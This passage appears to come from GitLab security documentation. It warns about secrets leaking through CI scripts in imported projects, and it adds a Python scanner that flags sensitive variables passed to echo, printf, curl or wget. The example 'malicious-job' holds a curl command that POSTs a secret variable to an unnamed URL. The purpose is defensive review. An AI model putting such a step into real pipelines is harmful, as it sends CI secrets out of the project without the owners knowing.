`.gitlab-ci.yml` file of imported projects before you add files or run pipelines against them.

The following example shows malicious code in a `.gitlab-ci.yml` file:

```yaml
accidental-leak-job:
  script:                                         # Password exposed accidentally
    - echo "This script logs into the DB with $USER $PASSWORD"
    - db-login $USER $PASSWORD

malicious-job:
  script:                                         # Secret exposed maliciously
    - curl --request POST --data "secret_variable=$SECRET_VARIABLE" ""
```

To help reduce the risk of accidentally leaking secrets through scripts like the one in `accidental-leak-job`, all variables containing sensitive information should be masked in job logs. You can also limit a variable to protected branches and tags only.

Alternatively, use the GitLab integration with HashiCorp Vault

Malicious scripts like the one in `malicious-job` must be caught during the review process.
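A reviewer-side check for the two patterns in `accidental-leak-job` and `malicious-job`, as an added example that is not part of the original page or of GitLab's tooling: it flags script lines that print a sensitive variable to the job log or pass it to a network client. The function name `review_ci`, the command lists and the line-based parsing are assumptions made for illustration.

```python
import re

# Sample input: the two jobs from the page's example (URL left empty, as on the page).
SAMPLE = '''\
accidental-leak-job:
  script:
    - echo "This script logs into the DB with $USER $PASSWORD"
    - db-login $USER $PASSWORD

malicious-job:
  script:
    - curl --request POST --data "secret_variable=$SECRET_VARIABLE" ""
'''

VAR_REF = re.compile(r"\$\{?([A-Za-z_][A-Za-z0-9_]*)\}?")
# Assumed, non-exhaustive command lists; extend them for your own pipelines.
PRINTERS = {"echo", "printf"}        # write their arguments to the job log
SENDERS = {"curl", "wget"}           # send data off the runner


def review_ci(text, sensitive):
    """Return (job, kind, variable, line_no) tuples for a reviewer to inspect."""
    findings, job = [], None
    for line_no, raw in enumerate(text.splitlines(), 1):
        if raw and not raw[0].isspace() and raw.rstrip().endswith(":"):
            job = raw.rstrip()[:-1].strip()      # unindented key: job name
            continue
        item = raw.strip()
        if not item.startswith("- "):
            continue                             # only inline list items are scanned
        words = item[2:].split()
        command = words[0] if words else ""
        kind = "log" if command in PRINTERS else "network" if command in SENDERS else None
        if kind is None:
            continue
        for name in VAR_REF.findall(item):
            if name in sensitive:
                findings.append((job, kind, name, line_no))
    return findings


if __name__ == "__main__":
    for job, kind, name, line_no in review_ci(SAMPLE, {"PASSWORD", "SECRET_VARIABLE"}):
        print(f"line {line_no}: {job}: ${name} reaches {kind}")
```

The scan is a line-based heuristic: multi-line block scalars, included files and commands wrapped in shell scripts are not covered, so it supplements the review of `.gitlab-ci.yml` changes rather than replacing it.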